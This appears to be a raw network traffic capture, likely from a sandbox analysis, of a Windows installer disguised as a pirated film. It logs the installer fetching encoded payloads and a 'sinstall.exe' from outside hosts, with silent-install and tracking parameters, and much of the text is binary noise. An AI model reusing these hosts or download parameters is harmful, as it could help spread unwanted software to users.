..V.M.g.8.9.J.3./.h.4.F.q.H.i.H.W.Y.S.5.7.B.z.6.1.W.M.b.O.J.u.n.6.t.F.w.S.V.F.c.R.Y.k.G.g.n.Z.w.s.0.R.Q.x.m.z.E.o.s.8./.q.n.g.M.T.z.j.4.j.C.v.l.R.6.f.u.y.A.r.D.d.K.u.A.I.z.Z.d.v.A.p.M.u.o.Q.t.d.b. .f.u.U.R.J.q.5.8.m.7.K.0.3.O.n.t.k. .T.9.H.9.8.N.T.7.Z. ./.9.A.p.M.S.u.z.q.E.n.t.N.W.U.V.5.b.W.z.q.a.v.q.x.K.Y.K.e.s./.i.b.C.K.d.M.y.i.B.3.P.I.I.z./.W.W.i.O.D.D.u.B.I.M.1.s.q.h.G.j.i.i. .z.e.r.R.x.h.j.T.W.E.E.E.b.5.s.m.5.E.d.G.A.Y.7.S.S.2.E.5.b.Q.p./.L.i.R.r.d.q.8.7.h.8.i.H.P.Y.c.t.f.C.b.T.7.d.P.n.k.9.l.n.T.8.5.2.L.M.Y.T.c.7.8.N.N.m.h.3.Y.w.9.i.v.U.M.6.r.i.S.6.u.K.D.D.R.6.h.w.j.L.v.6.j.l.o. .C.F.R.c.o.C.7.E.W.8.1.3.l.O.C.6.8.V.a.N.K.q.X.C.u.f.B.g.9.X.m.u.O.V.V.m.S.R.X.a.M.T.f.A.l.d./.t.7.L.S.o.F.S.T.1.j.H.P.k.P.v.5.T.c.t.Y.q.D.9.p.e.k.y./.n.r.v.T.w.c.j.7.J.0.d.c.s.D.i.x.3.l.i.n.a./.x.E.G.T.z.8.Z. .o.n.I.k.A.k.P.7.4.x.n.G.S.Q.g.g.9.C.8.i.r.i.p.Q. .0.3.3.M.6.J.N.g.J.Z.N.f.w.y.N.D.J.b.w./.p.j.x.E.t.H.X.7.c./.X.7.T.H.3.t.w.o.v.s.E.q.6.8.Q.6.j.1.E.O.i.q.D.T.A.J.L.q.d.a.8.K.S.B.l.0.e.n.D.M.0.t.E.i.A.6.W.U.O.i.8.R.l.P.L.5.x.2.D.Q.a.j.C.T.i.1.V.X.E.Z.p.0.X.s.7.K.P.a.0.j.q.Y.u.Q.G.I.F.U.G.y.5.d.g.o.J.z.L.r.O.q.2.7.s.X.f.8.Q.z.m.c.P.8.t.4.G.F.A.7.K.e.N.5.j.4.E.s.G.7.E.A.W.A.m.x.n.b.S.M.u.x.5.k.1.f.L. .k.S./.Q.M.i.t.z.w. .f.R.2.K.r.i.X.A.z.D.E.S.r.X.e.J.F.U.u.D.A.o.K.m.7.X./.S.v.I.H.B.q.N.V.B.J.g.r.s. .S.s.A.U.a.x.M.p.R.3.E. .8.M.1.M.M.2.x.r.W.l.Y.A.J.L.1.9.U.b. .v.c.K.m.p.X.c.K.s.H.V.n.o.Z.5.7.V.O.f.M./.c.J.6.O.A.2.5.H.3.S.o.7.d.X.l.3.o.r.H.w.I.X.h.O.N.5.L.l.r.I.t.e.5.I.D.t.A.O.O.0.y.Y.Z.3.D.b.D.p.A.r.b.u.2./.k.u.s.Y.B.C.Y.l.4.

<<< skipped >>>

GET /?e=eghjkt&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=24379&&country=UA&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: multipledirect.ru

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:53:21 GMT

Content-Type: application/octet-stream

Content-Length: 2275179

Connection: close

Content-Disposition: attachment; filename="g7CyPVZagCsRV8.ca"

Content-Transfer-Encoding: binary

Access-Control-Allow-Origin: *

..z.g."..g.......}.......G...G.........=..".....v.....9...#3..y#..M...A..ty..es..H.......'..wf..g...^...O..5<..?r..A..HE..:/..o\.M....F..5w..-$..G...Y..@}..kq.....S....C..;~..hb..F...V..9*..5(.....VN..?l.." ..^...I...r..q1..=......^F..7d..*(.TV...A..*z..i9.GE......f~../|..R..\N...y.."b..<......P...2e..0i.........=`..&$.BZ..@...m?..9f..U..XM..Ig..$y..`......CV..s*..*c..[......#f..=v.\Y......{]..k2..R...C...0.. ~..5..TQ.._]..$$..~f..W...J..tv..:a..J......ge..(=......O...r..|n..2...B......)<..q1.BR...P..6<..*-..]...F..}%..1$.....JJ...h..>$.."...U...N..hr..h'.M....Q..,}..`e......\..28...3.....A....r..9c..!..]K...U..tq...}._v..O...6w..'j......Z..)j..-4..A......Zz..3x.....XR...E..&~..zb.....\...>a..<m.........9l.."(..^..\...Q;..%b..)..\Q..M[.. e..da.....OI......&g..W......'j..9z..]..KQ.. (..jj..#...^..HB..}k..0u......X..%8..}5.F^...\..20...!..Y...B..A!..- ..t..NV...T..:8..&)..Q...J..$v..d#.I....]..(q..di......X...<..27..g..E....N..=...%,.QO...Q..xu..*?.P...]...)v..%g..]..YW...i..pm..{..Sr..C...:s.. n......V..-f..)8.GE..DN..?l.." ..J..Py..Bo..|b..b......T...0t..hv.E...J...e6..j(.L.......l%..5*......D...,..#o..,..VB..HA..vs..hq.E...J...e6..j(.A...N...a:..n$.....A...Y(..`I..r..Lu..[...n#..x=.I...^a..i'..a;.I...Y...t)..`9.....\h..Bl..r ..}..._..>...!b..%1.Z@..D\..z`..di.A..._...$)..e6.....@...L,...=..h..F...H...}*..q,.@.......p%..|0.N...[...r ..~7.....\...I&..~8..r......Z...f%..l0.O....e..b<..y6.P...Tm..u4..q*.....A....>..`1..'.......A..:!..u0.F.......t"..w,.L...N...f0..`:.....Y...Q!..b=.

<<< skipped >>>

GET /?e=ytr&cht=2&dd=19&clsb=1&publisher=24379&country=UA&prv=bestadblocker&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: multipledirect.ru

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:53:38 GMT

Content-Type: application/octet-stream

Content-Length: 2252297

Connection: close

Content-Disposition: attachment; filename="dB1XJloRgbF4Qw.ca"

Content-Transfer-Encoding: binary

Access-Control-Allow-Origin: *

..z..^"..1..............0@..0@......0..Q=]".....[,.......*.1...............G.....-.>.(.b.?.:.6.4.*...'...(. .0.".M.P...\.R.~._.a.@.H.X.O.U.C.[.D.z.V.w.I.x.p.`.x.w.a.y.'...>.j.m..............\...U...........Y...=.r.".c.?.1.=.~. .8.&.s.>.'.6...S.].^...X.@.^.o.K...o.a.U.E.N.u.w.o.{.t.d.].a.q.b...X.x.t.9.y.8M.J.C.T.5.1.E.@.B.^.].\.&.$.&.%.o. .Q.7.#.9...4.r...,.:.5.k.'.z.t.h.h._.@.G.o.T.F.Y.Y.M.W.I.@.U.p.n.c.<.R.v.`.u.B.8.'. .r.l.p.`..!...G.*.......^....... .%.8.....?.9...?.%.1.7...>.%. .!.(...n...a.P.S.g.r...8.u.M._.N.e.........&.*...(.w.u.*. .m.4.k.<.7.6...n................M...........X.../.2.>.<.2...}.?.!.9.'.r.?.&.7...R.\._...Y.[.G.].p.H...G.I.Q.O.D.1.s.u.m.{.....D.f.~.j.e...k.l.S..\.v.......0...M.\.].Z.X.D.'.....,...7.e...$.p...!.9.>.).#.f.'.4.Z.P.Y.]...p.A.\.W.M.O...C.P.F.L.}.y.8.H.t.}.z.b.,...x.l.e.M.?.{K.O.L.A.Z.7.7.G.^.@.X._.R.$.".$...m.&.S...<. .0.#.?.A.:...=.a.).L.J.W...X.E.V.T.V._.F._...M...S.h.x.;.}.:.{.3...`.i.y.o.u.q.f.t........X.....R.........H......... .9.z.-.".&.!.1.:.l.&.).#.'. . ...Y...Q...F.W...A.O.G.D.R...J...p.r.n.t.6.f.q.c...b.*.f.r.h.".n_.........U.......M.........C...<.}.2.5.$.#.s.>.o."...i./.).c.....U.K.V.[.[...r.F.F...f...J.L.M.?.s.u.m.{.5.}.1.j.y.y.).h.w.`.l......Z.....T.1.....N...H.....B...~.2.4.,.:.t. .3.=.b.@.!.5.6...(.J.....M.C.[.F.Q.H.O.E...H.K.W.I.m.}.v.'. .u.'.w.K...\.e...q.A.Q......3.'.0...?..._.....V.)... .o...~.......0.>...7.....>.p... .{.n...h.R.g.K.C.e.U.F.P.h...a.e.x.^.(.}.b.`.#.".h.>.:.H.^. .A.3..0.>.0.....>.....Z...%...".

<<< skipped >>>

GET /?step_id=6_1_4&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: c1.goody-best.info

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:53:53 GMT

Content-Type: text/html

Content-Length: 10306

Connection: close

Content-Disposition: attachment; filename="6_1_4.txt"

..T.s.s.1.J.p.n.g.s.B.Y.B.W.W.f.S.U.M./.P.U.r.B.l.k.q.D.G.V.Y.E.j.3.w.C.3.f.z.O.l.3.7.V.k.b.9.8.z.s.t.i.0.R.j.q.R.y.1.y.t.B.9.f.Q.S.w.k.f.H.x.g.8.V.k.U.L.R.H.I.j.1.J.g.n.B.u.D.n.W.v.h.T.R.g.N.d.g.F.Q.C.h.s.S.7.F.8.3.9.r.o.u.8.L.s.B.K.G.e.C.U.a.j.U.H./.v.R.l.D.M.V.g.0.4.1.K.Y.i.N.k.L.v.3.J.j.T.3.l.6.o.J.S.6.M.D.N.e./.O.N.t.j.W.0.p.j.3.v.Q.v.c.n.J.8.p.U.p.0.I.H.6.G.L.g.h.G.r.C.9.s.x.f.5./.d.Y.h.g.y.L.E.U.S.R.W.1.i.o.E.S.6.X.2./.r.z.a.K.w.Y.q.7.R.I.r.q.M.a. .Z.O.2.c.2.G.y.B.5.k.L.I./.r.q.R.2./.9.o.m.C.d.c.i.o.G.R.R.w.h.i.g.A.M.x.Q.2.6.A.p.n.2.R.g.H.m.R.C.u.k.r.F.6.y.M.F.Q.5.Y.A.F.i.V.7.Z.0.g.3.O.G. .n.j.M.p.6.D./.i.D.X.N.C.j.L.K.5.m.B.U.X.e.X.C.E.w.Y.L.S.m.h.5.y.b.A.u.s.w.a.0.N.M.F.r.F.0.z.C.b.T.Q.B.X.9.M.I.b.t.M.O.1.7.O.l.D.P.Q.Z.q.9.u.5.F.f.f.q.b.e.D.2.d.u.T.I.Y.q.j.c.W.z.g.r.3.B.x.X.q.O.M.b.b.M.6.9.V.U.0.1.G.q.s.u.P.Y.c.E.v.k.i.r.y.L.y./.I.N.y.x.J.x.v.M.Y.U.E.A.N./.4.w.q.9.A.J.Y.2.7.J.v.Q.1.Q.d.Y.5.m.C.v.d.2.N.i.U.n. .9.3. .l.8.y.m.z.s.x.t.K.o.D.2.l.n.G.i. .w.Q.I.W.X.z.F.0.z.1./.Y.A.p.c.P.n.2.z.a.g.F.5.t.t.Z.g.o.r.H.5.V.G.U.H.m.q.W.l.7.B.n.D.B.8.F.b.N.C.E.m.e.c.w.l.5.A.X.R.Y.1.Q.2.6. .W.M.P.9.q.u.U.k.5.e.9.X.u.e.w.E.0.G.F.E. .E.Y.7.j.b.A.D./.5.s.g.h.R.d.g.u.m.o.9.u.8.G.5.x.z.n.h.D.4.S.O.U.1.q.e.k.0.A.w.W.j.n.P.o.D.s.Y.U.Y.l.Z.t.H.p.W.1.5.I.G.R.Z.s.S.y.b.d.7.O.q.9.p.F.y.n.q.P.W.p.T.i.z.o.5.H.t.s. .i.D.E.2.y.v.a.1.W.W.q.H.N.Y.J./.Y.f. .t.d.u.y.f.g.c.q.y.V.n.O.k.p.L.S.V./.3.q.A.v.K.Z.s.7.C.R.Z.v.C.U.o.d.E.2.f.z.j.U.R./.Z.R.n.p.l.0.l.b.E.T.I.0.W.B.V.t.d.n.6.H.2.0. .Q.8.V.N.X.R.7.y.E./.J.C.p.E.W.N.Y./.L.V.u.T.U.y.j.

<<< skipped >>>

GET /?step_id=6&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: c1.goody-best.info

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:53:08 GMT

Content-Type: text/html

Content-Length: 31266

Connection: close

Content-Disposition: attachment; filename="6.txt"

..7.3.8.R.2.X.Z.R.1.u.D.u.2.T.h.O.Q.I.6.p.r.j.W.j.6.3.n.l.F.W.r.v.S.Z.0. .9.J.b.N.g.L.q.a.8.v.k.r.I.3.N.e.O.x.B.Y.c./.A.5.e.k.2.M.Z.O.x.D.1.y.d.K.N.w.A.7.S.N.1.S.h.W.P.B.g.k. .2.0.h.K.Q.K.O.9.m.P.y.u.C.v.7.C.1.O.0.Z.W.7.s.D.i.6.h.a.N.A. .d.9.J.b.r.Z. .v.L.3.N.J.Q.x.N.j.S.b.O.o.l./.p.R.F.P.C.h.W.Q.4. .w.z.U.a.Q.Y.b.y.k.x.h.T.y.L.8.Q.y.d.P./.r.o.B.7.N.t.t.c.I.7.8.U./.u.K.L.d.C.9.j.D.F.i.G.5.N.u.U.V.n.H.s.Q.2.H.j.7.1.D.j./.9.c.w.r.k. .F.n.m.u.6.7.t.8.H.5.o.S.7.D.V.h.I.Y.4.F.E.Z.8.0.N.a.A.f.Y.U.u.z.M.l.n.g.E.y.9.k.E.8.q.p.I.d.8. .Y.e.e.2.W.v.I.Z.m.h.l.A. .N.F.m.Z.7.g.K.3.b.u.K.V.V.s.k.j.7.Y.y.m.U.y.I.C.u.v.M.t.x.j.P.Y.0.b.x.M.q.4.4.P.o.B.0.6.I.2.M.q.2.9.z.N.V.B.w.Y.B.O.B./.F.s.q.M.B.G.e.V.x.p.p.M.O.5.m.U.A.M.x.x.9.o.s.0.a.9.n.g.6.j.t.t.R./.Q.J.O.y.3.p.X.4.d.i.M.a.K.3.7.Y.S.u.L.K.F.B.z.o.5.I.p.6.6.6.3.0.Q.r.B.A.y.I.q.r.j./.a.E.z.S.4.P.5.5.8.Q. .Y.v.v.n.N.I.l.8.b.R.D.V.r.8.f.z.p.I.V.J.y.E.B.k.O.2.u.2.8.w.1.i.R.w.G.O.0.7.O.L.F.o.u.F.E.u.r.c.z.6.E.0.i.u.y.R.5.D.O.k.8.O.i.m.N.l.M.5.D.6.u.T.I.M.d.6.H.1.L.7.i.S.e./.T.M.V.O.5.6.e.e.2.y.j.4.w.L.r.Q.Y.f.x.q.V.l.s.T.I.O.n.I.a.C.L.0.t.Q.x.r.A.u.7.c.p.k.1.I.u.3.3.J.u.n.1.6.q.t.M.l.k.5.i.4.a.M.6.c.p.U.Y.8.h.7.R.s.R.J.Y.g.h.U.I. .X./.w.f.H.K.a.O.r.m.R./.o.y.0.j.X.6.S.K.9.W.0.V.0.I.8.Y.R.f.E.f.W.q.L.S.6.l.b.n.N.B.7.r.r.r.9.I.4.3.x.f.p.R.K.Z.D.x.X.C.C.Z.c.E.N.c.J.U.C.T.6.H.E.e.1.s.B.R.J.O.A.2.e.D.8.E.u.2.n.y.T.X.p.y.w.e.F.J.t.j.4.E.r.4.J.G.3.j.e.G.n.H.K.8.G.A.G.L.c.D.G.C.H.A.l.x.8.d.H.f.Q.L.o.C.a.P.n.m.R.7.e.4.5.V.a.T.h.w. .w.n.F.L.D.D.V.m.W.H.n.h.T.Z.Y.8.I.U.w.0.2.i.T.x.r.Q.S.U.z.

<<< skipped >>>

GET /?step_id=6_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: c1.goody-best.info

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:54:01 GMT

Content-Type: text/html

Content-Length: 8236

Connection: close

Content-Disposition: attachment; filename="6_2.txt"

..t.Q.p.4.H.k.g.B.4.Z.N.N.v.w.P.F.H.w.D.j.Q.d.h. .M.7.q.P.8.r.V.x.S.o.v.M.T.N.Z.y.2.5.Y.E.q.L.P.I.S.7.d.F.N.r.l.G.i.G.n.R.q.N.g.u.K.Z.2.1.a.M.h.f.d.U.i.u.8.U.z.U.B.n.X.H.n.8. .d.7.r.H.O.y.I.N.Y.b.U.h.5.W.y.O.O.T.w.D.E.Y.B.P.5.1.b.9.T.R.V.6.g.3.I.x.r.L./.C. .m.1.5.7.i.T.x. .6.A.i.N.u.P.L.i.z.R.W.d.E.t.V.H.5.R.W.7.I.z.3.H.L.z. .o.C.v.Z.N.G.D.Z.9.e.a.k.C.p.x.a.C.5.q.z.p.e.C.Z.5.c.0.C.S. .p.I./.z.Z.Z.F.R.n.F.F.g.V.t.R.I.f.q.V.j.U.O.4.V.t.v.H.K.W.z.Q.1.Z.8.m./.1.q.J.G.G.3.S.Y.X.s.E.g.6.g.E.R.S.G.9.4.N.d./.K.1.u.x.w.n.E.A.I.O.3.w.B.W.Y.a.8.T./.R.l.G.v.D./.1.S.f.M.S.A.B.l.M.u.k.m.M.a.5.c.k.g.p.m.u.P.Y.q.a.g.6.N.3.V.S.c.C.b.4.2.E.k.4.l.Y.X.p.p.o.I.r.i.w.H. .D. .I.R.O.T.T.x.m.T.8.4.C.N.t.2.V.3.I.W.Z.j.G.A.3.L.D.7.n.Y.X.5.i.m.T.L.O.U.I.E.t.9.p./.e.X.u.R.P./.N.X.g.N.h.H.Z.j.u.5.K.z. .y.V.6.y.P.K.G.v.w.9.h.2.6.v.j.0.x.P.k.H.v./.t.A.l.m.i.w.t.U.a.F.h.k.H.a.l.W.T.s.z.f.z.c.i.n.9.S.6.U.0.7.2.g.4.c.E.f.3.O.e.2.d.K.a.U.z.N.r.4.e./.8.T.W.s.8.c.T.D.M.o.V.D.r.8.X.T.3.0.0.P.C.3.G.n.C.o. .n.t.z.i.H.i.2.6.j.h.D.8.X.u.X.B.c.p.V.a.m./.i.V.g.X.5.7.G.0.q.G.f.C.6.X.a.e.o.q.E.h.w.i. .v.B.Z. .z.G.m.4.w.Y.Q.D.A.R.2.N.Y.H.w.k.L.z.G.x.k.i./.F.e.h.A.V.i.U.M.w.y.1.u.4.e.h.C.G.I.r.W.Q.I.0.J.U.P.8.h.E.M.F.X.5.v.4.l.U.2.B.X.Y.9.x./.G.9.1.b.t.U.2.A.b.u.r.u.v.k.Q.Q. .y.F.t.G.d.E.D.l.N.G.x.8.J.D.7.S.L.Y.a.U.O. .Z.h.T.J.c.c.k.E. .0.0.r.a.l.I.T.d.9.A.S.R.2.h.n.V.Q.6.K.i.e.5.O.C.Y.V.G.o.Q.4.f.9.l.A.b.M.A.V.c.2.p.0.9.d.7.F.4.n.s.A.B.w.q.4.z.A.3.7.Q.m.P.A.6.i.C.d.K.8./.C.w.y.O.I.4.e.Y.I.x.2.K.4.h.Q.j.p.d.u.R.y.C.P.X.E.Q.g.d.Z.6.8.F.X.n.L.U.r.q.G.l.1.h.s.w.

<<< skipped >>>

GET /?step_id=6_2_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: c1.goody-best.info

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:55:12 GMT

Content-Type: text/html

Content-Length: 4214

Connection: close

Content-Disposition: attachment; filename="6_2_1.txt"

..1.Q.v.c.E.m.j.2.W.v.j.x.2.w.t.8.9./.j.7.c.g.C.X.d.x.d.E.5.u.r.N.2.3.u.5.P.t.Q.u.4.i./.M.S.M.P.9.3.n.m.4.M.H.f.T.g.n.S.k.c.X.Z.1.1.9.0.o.N.P.i.H.d.B.K.2.X.M.e.6.y.a.R.A.O.E.5.T.u.Z./.4.V.B.J.O.S.X.d.H.4.4.p.T.A.2.y.B.j.n.a.5.s.y.f.B.b.Q.S.k.P.5.u.h.U.x.6.P.T.m.i.z.J.6.C.U.Q.l.T.W.T.Y.E.p.t.O.x./.2.Q.L.b.w.T.v.K.l.z.x.y.C./.J.i.D.u.m.N.w.D.l.M.6.L.b.G.K.V.8.2.C.w.R.7.E.E.j.8.v.a.k.a.0.H.n.Z.U.F.d.M. .o.u.g.C.8.4.k.I.k.v.P.U.c.e.6.C.7.H. .x.9.w.J.7.o.z.L.b.G. .c.9.u.5.M.T.g.Q.b.Q.5.3./.Y.q.O.6.n.2.s.H.3.s.T.u.K.V.F.N.1.p.b.x.Y.8.H.o.G.5.Q.T.W.R.M.C.F.N.8.6.d.Y.Z.k.n.2.I.E.E.I.z.I.L.v.l.z.W.P.A.Q.i.k.3.u.b.Y.X./.N.J.F.O.v.Q.W.n.i.q.v.n.n.5.e.L.O.Z.7.o.a.c.p.I.f.X.4.6.N.d.e.7.l.Q.Y.U.L.R.y.K.u.s.Z.M.f.U.i.n.U.t.c.D.a.Q.q.D.v.n.l.P.E.q.M.r.O.h.W.7.8.C.Z.w.g.9.x.X.h.o.D.Q.h.S.8.9.3.O.s.i.x.p.x.2.8.M.W./.5.g.2.q.8.r.A.w.4./.l.C.V.t.2.f.O.f.n.a.u.V.N.B.h.g.B.K.A.g. ./.i.P.A.0.k.U.g.9.u.Q.A.p.V.8.S.z.T.K.c.Y.C.6.n.4.K.K.M.G.Q.X.7.E.a.c.i.7.F.E.7.Z.p.L.H.I.w.x.8.I.w.Q.m.s.C.e.Z.n.9.U.U.r.R.q.L.v.K.z.A.h.b.q.1.j. .X.u.G.3.5.R.U.L.w.r.3.t.k.z.h.C.9.P.Y.K.P.Z.V.H.z.D.k.a.A.z.d.A.v.Q.H.T.R.i.i.g.t.O.f.p.F.0.z.5.G.R.k.5.d.7.f.v./. .J.I.g.9.L.N.R.j.k.W./.o.d.t.9.9.C.i.C.6.t.I.X.5.C.J.A.K.2.7.N.D.I.r.q.d.F.1.U.w.1.9.s.B.9.O.v.Z.s.u.q.G.F.7.7.6.0.O.W.O.j.4.J.M.V.j.y.4.A.V.i.a.K.R.P.u.H.R.e.F.w.6.0.O.B.F.L.R.V.M.6.G.m.W.E.A.Z./.j.6.P.h.4.S.P.A.8.8.N.W.2.I.s.F.q.t.y.1.B.z.q./.K.e.U.r.X.g.f. .4.6.w.d.p.U.l.7.8.f.G.U. .f.d./.B.k.h.x.X.Y.7.B.S.0.l.a.t.J.a.O.9.H.1.h.a.b.u.D.E.C.W.M.q.i.I.y.A.w./.U.5. .A.Z.0.k.b.V.K.0.g.V.z.D.p.Q.M.A.

<<< skipped >>>

GET /?e=bsp&clsb=1&publisher=24379&country=UA&dd=5&cid=334&vn=158&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: multipledirect.ru

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:53:55 GMT

Content-Type: application/octet-stream

Content-Length: 524274

Connection: close

Content-Disposition: attachment; filename="fyBYRfMAYKA66R.ca"

Content-Transfer-Encoding: binary

Access-Control-Allow-Origin: *

..z.....B{...............H...H......D.=.........v#..o}..-)..!........M..jU..K...l..6...,>..:...9Z..H...A.......L..q4..D2..iz..%....J...4.......Y.7...(g..>s..@{..JF..NZ...V...[.9e..}$..y=..Pv..[...]...x...EV..y..<j.."w..L...QB..CX...R...T.....>d.. i..Nq..O|..bW...L...Q..fY. ...=n..xc.. ~...H...K..G...S..(...!1..d'..8...RY...;...H...V..v..<j..,|..!...<....O..tW..dZ..o..#|..xi..Ao..&|...J...I..A...U..*...#7..f!..:.......NY...V...[.7...*'..<u..?`..N...G.......J...2..Nu..5-..em..$B...D...*...=.....3...."..6z..,........I..nQ..p..v!..-...5n..6{...^..D...]......{0..}8..Xx..ev...8...........@..b..h~..4r..:...DG.._O..FI...Z.....3... *..3'..;d..CD..HY...T...R.w}..l9..f=..2.......^....<.....'7../p..2~..-....=...F...U..M...)......' ..b-..>(......OE...Z.....C...6l..6z..*..............._..m*..&>..`1..h2.......K..hS..P^.'.../p..2~../........M..jU..]...l..?...<|..&...<U...=......U...P..(4..~ ..f8..",...A..vI..RN...<.Xc..zk..}b.. {...H...6.......P.xt..2h..2~../....!...)...H..Q...g..\o..=b..1...9Z...D...*...O.....#|..b-..{8..0,..V...^........Y.2...(6..5>..=f...H...K..G...S..(...!1..d'..8.......G_..V...L...h..ta..k$..xx..l[.......J..RZ..s..> ..o:..z~..nw..A...BN.......Y.5...-6..>s..@{..K....%...N...P.bw..2h..<u..B}..p3...-...H...V..y..<j.."w..L...p....9......U...P..(4..~ ..f8..",...A...T..Z...S..Jh..q>..g&..R`.._H...6...5.....Ze..|m..jb.."x...N...0.......].....$...):..,>..}...H@..\Y..S...P.. 4.. i..3l..r=..K.......F...N..J8..w`..'...=3.......V..SV..WE.:$..k>..~z..js..E

<<< skipped >>>

HEAD /addons/sinstall.exe HTTP/1.1

Accept: */*

Accept-Encoding: identity

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Pragma: no-cache

Expect: 100-continue

Host: i1.scanwebresolver.com

Connection: Keep-Alive

HTTP/1.1 100 ContinueHTTP/1.1 200 OK..Server: openresty..Date: Wed, 01 Jul 2015 04:55:14 GMT..Content-Type: application/octet-stream..Content-Length: 1085440..Last-Modified: Wed, 04 Feb 2015 13:58:06 GMT..Connection: close..ETag: "54d2256e-109000"..Accept-Ranges: bytes..

